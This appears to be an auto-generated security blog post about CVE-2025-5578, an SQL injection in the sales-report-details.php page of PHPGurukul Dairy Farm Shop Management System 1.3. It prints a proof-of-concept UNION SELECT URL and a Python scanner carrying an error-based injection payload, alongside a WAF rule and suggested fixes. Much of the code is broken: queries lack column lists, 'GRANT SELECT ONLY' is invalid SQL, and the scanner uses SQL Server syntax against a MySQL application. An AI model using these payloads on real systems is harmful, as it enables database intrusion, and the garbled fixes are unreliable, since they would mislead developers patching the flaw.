PHPGurukul Dairy Farm Shop Management System 13, SQL Injection, CVE-2025-5578 (Critical)

By /

Listen to this Post

How the CVE-2025-5578 Works

The vulnerability exists in the `/sales-report-details.php` file of PHPGurukul Dairy Farm Shop Management System 1.3. The application fails to properly sanitize user-supplied input in the `fromdate` and `todate` parameters before using them in SQL queries. This allows attackers to inject malicious SQL commands through crafted HTTP requests. The vulnerability is remotely exploitable without authentication, enabling attackers to manipulate database queries, extract sensitive information, or compromise the entire database server. The SQL injection occurs due to direct concatenation of user input into SQL statements without parameterization or proper escaping.

DailyCVE Form

Platform: PHPGurukul Dairy
Version: 1.3
Vulnerability: SQL Injection
Severity: Critical
Date: 06/04/2025

Prediction: Patch by 08/2025

What Undercode Say:

-- Exploit PoC
http://target.com/sales-report-details.php?fromdate=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- &todate=2025-01-01

// Protection Code
$fromdate = mysqli_real_escape_string($conn, $_GET['fromdate']);
$todate = mysqli_real_escape_string($conn, $_GET['todate']);
$query = "SELECT FROM sales WHERE date BETWEEN '$fromdate' AND '$todate'";

WAF Rule
SecRule ARGS_GET "@detectSQLi" "id:1005578,phase:2,deny,status:403,msg:'CVE-2025-5578 Exploit Attempt'"

Vulnerability Scanner
import requests
def check_vuln(url):
payload = "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"
r = requests.get(f"{url}/sales-report-details.php?fromdate={payload}&todate=2025-01-01")
return "Conversion failed" in r.text

-- Database Hardening
REVOKE ALL PRIVILEGES ON dairyfarm. FROM 'webuser'@'%';
GRANT SELECT ONLY ON dairyfarm.sales TO 'webuser'@'%';

// Secure Alternative
$stmt = $conn->prepare("SELECT FROM sales WHERE date BETWEEN ? AND ?");
$stmt->bind_param("ss", $_GET['fromdate'], $_GET['todate']);
$stmt->execute();

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top